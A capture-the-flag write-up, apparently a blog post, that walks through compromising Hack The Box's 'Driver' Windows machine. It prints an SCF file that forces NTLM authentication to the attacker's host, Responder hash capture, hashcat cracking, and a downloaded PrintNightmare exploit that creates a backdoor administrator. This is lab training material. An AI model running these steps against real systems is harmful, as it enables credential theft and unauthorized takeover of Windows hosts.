Home Hack The Box - Driver
Post
Cancel

Hack The Box - Driver

By h3xit
Posted Jan 16 Updated Jan 30 5 min read

Challenge description

https://app.hackthebox.com/machines/Driver

This VM is an easy Windows machine

Reconnaissance / Enumeration

Port scanning and service identification

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38

$ rustscan -a $ip -r 1,65535 -- -A -sC

PORT     STATE SERVICE      REASON  VERSION
80/tcp   open  http         syn-ack Microsoft IIS httpd 10.0
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
| http-methods: 
|   Supported Methods: OPTIONS TRACE GET HEAD POST
|_  Potentially risky methods: TRACE
| http-auth: 
| HTTP/1.1 401 Unauthorized\x0D
|_  Basic realm=MFP Firmware Update Center. Please enter password for admin
|_http-server-header: Microsoft-IIS/10.0
135/tcp  open  msrpc        syn-ack Microsoft Windows RPC
445/tcp  open  microsoft-ds syn-ack Microsoft Windows 7 - 10 microsoft-ds (workgroup: WORKGROUP)
5985/tcp open  http         syn-ack Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
Service Info: Host: DRIVER; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-time: 
|   date: 2022-01-17T02:16:50
|_  start_date: 2022-01-16T20:40:33
| smb-security-mode: 
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode: 
|   3.1.1: 
|_    Message signing enabled but not required
| p2p-conficker: 
|   Checking for Conficker.C or higher...
|   Check 1 (port 25778/tcp): CLEAN (Timeout)
|   Check 2 (port 18115/tcp): CLEAN (Timeout)
|   Check 3 (port 26928/udp): CLEAN (Timeout)
|   Check 4 (port 15033/udp): CLEAN (Timeout)
|_  0/4 checks are positive: Host is CLEAN or ports are blocked
|_clock-skew: mean: 6h59m58s, deviation: 0s, median: 6h59m58s

SMB Enumeration

All tools I used reported no open share

Web Enumeration

Browsing to http://driver.htb gets us to a basic authentication login prompt. After trying a couple usual default password, I manage to log in with admin/admin.

After logging in, we get to what looks like a printer admin page.

On the “Firmware Updates” tab, we can upload a file and the page says :

Select printer model and upload the respective firmware update to our file share. Our testing team will review the uploads manually and initiates the testing soon.

It’s a pretty clear indication that “someone” or “something” will check the file we upload.

After trying some upload tricks, well, no tricks are needed. There are no restriction what so ever.

Exploitation && Foothold

Let’s read this again:

Select printer model and upload the respective firmware update to our file share. Our testing team will review the uploads manually and initiates the testing soon.

It says that our uploaded file will be placed on their file share which implies that someone will browse the share.

Let’s do a SCF file attack

Per Pentestlab.blog:

However a SCF file can be used to access a specific UNC path which allows the penetration tester to build an attack. The code below can be placed inside a text file which then needs to be planted into a network share.

When the user will browse the share a connection will established automatically from his system to the UNC path that is contained inside the SCF file. Windows will try to authenticate to that share with the username and the password of the user. During that authentication process a random 8 byte challenge key is sent from the server to the client and the hashed NTLM/LANMAN password is encrypted again with this challenge key. Responder will capture the NTLMv2 hash.

1
2
3
4
5
6
7

$ cat << EOF > exploit.scf       
[Shell]
Command=2
IconFile=\\10.10.14.74\share\exploit.ico
[Taskbar]
Command=ToggleDesktop
EOF

We can now upload our exploit using the firmware update page and wait for responder to capture hashes:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18

$ sudo responder -w --lm -v -I tun0
                                         __
  .----.-----.-----.-----.-----.-----.--|  |.-----.----.
  |   _|  -__|__ --|  _  |  _  |     |  _  ||  -__|   _|
  |__| |_____|_____|   __|_____|__|__|_____||_____|__|
                   |__|

           NBT-NS, LLMNR & MDNS Responder 3.1.1.0

  Author: Laurent Gaffie (laurent.gaffie@gmail.com)
  To kill this script hit CTRL-C

[...]

[SMB] NTLMv2 Client   : ::ffff:10.10.11.106
[SMB] NTLMv2 Username : DRIVER\tony
[SMB] NTLMv2 Hash     : tony::DRIVER:90915e30a4d61b55:EFD5982FC730F2132B289A758EF1AB26:010100000000000017D7481F870BD801DADD4A94693D22FF00000000020000000000000000000000
[...]

Now, let’s crack it and use the password to log on the target:

1
2
3
4
5
6
7
8
9
10
11

$ hashcat -a 0 -m 5600 hashes /opt/wordlists/rockyou.txt 
hashcat (v6.2.5) starting

[...]
TONY::DRIVER:a4a1daba2e76ad05:597b6b92e2114645d6f9cf39f3a315ff:01010000000000007212b4fe870bd8011aa3e96919e9f60000000000020000000000000000000000:liltony
[...]

$ evil-winrm -i $ip -u tony -p liltony -s /tmp/driver

*Evil-WinRM* PS C:\Users\tony\Documents> more c:\users\tony\desktop\user.txt
(redacted)

Privilege Escalation

To escalate our privileges to administrator, we’ll be exploiting a recently discovered vulnerability affecting the Windows print spooler.

First, download the exploit and open a winrm session using Evil-Winrm using the -s option to load the folder containing the exploit.

The exploit script will allow us to create a new admin local user.

1
2
3
4
5
6
7

$ wget https://raw.githubusercontent.com/calebstewart/CVE-2021-1675/main/CVE-2021-1675.ps1 -O /tmp/driver/CVE-2021-1675.ps1

2022-01-17 08:55:58 (7.46 MB/s) - ‘CVE-2021-1675.ps1’ saved [178561/178561]

$ evil-winrm -i $ip -u tony -p liltony -s /tmp/driver

*Evil-WinRM* PS C:\Users\tony\Documents>

When Evil-Winrm is opened with the -s (–scripts) option, all the scripts inside the folder becomes directly accessible within the winrm session. Let’s load and run the exploit to create our backdoor user.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19

*Evil-WinRM* PS C:\Users\tony\Documents> CVE-2021-1675.ps1
*Evil-WinRM* PS C:\Users\tony\Documents> invoke-nightmare -newuser h3x -newpass h3xp4ss!
[+] created payload at C:\Users\tony\AppData\Local\Temp\nightmare.dll
[+] using pDriverPath = "C:\Windows\System32\DriverStore\FileRepository\ntprint.inf_amd64_f66d9eed7e835e97\Amd64\mxdwdrv.dll"
[+] added user h3x as local administrator
[+] deleting payload from C:\Users\tony\AppData\Local\Temp\nightmare.dll

*Evil-WinRM* PS C:\Users\tony\Documents> net localgroup administrators
Alias name     administrators
Comment        Administrators have complete and unrestricted access to the computer/domain

Members

-------------------------------------------------------------------------------
Administrator
h3x
The command completed successfully.

*Evil-WinRM* PS C:\Users\tony\Documents> exit

Now let’s use our new user to get admin privileges.

1
2
3
4
5
6

$ evil-winrm -i $ip -u h3x -p h3xp4ss!                         

Evil-WinRM shell v3.3

*Evil-WinRM* PS C:\Users\h3x\Documents> more c:\users\administrator\desktop\root.txt
(redacted)

Thanks for reading <3

h3x

hackthebox
cve windows smb printnightmare
This post is licensed under CC BY 4.0 by the author.
Recent Update
Contents